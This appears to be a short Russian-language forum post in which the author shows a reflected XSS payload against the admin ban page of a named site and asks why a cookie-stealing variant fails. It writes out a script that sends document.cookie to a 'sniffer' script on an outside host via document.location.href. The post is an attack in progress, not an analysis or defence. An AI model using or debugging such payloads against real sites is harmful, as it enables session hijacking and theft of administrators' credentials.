http://bans.eqline.ru/admin/add_ban.php/"><script>alert(document.cookie)</script>

если будем засылть на сниффер
типа document.location.href="http://site/sniff.php?"+document.cookie;
то XSS не отрабатывет, убираем ? и все ок,но не то ))))

в чем проблема?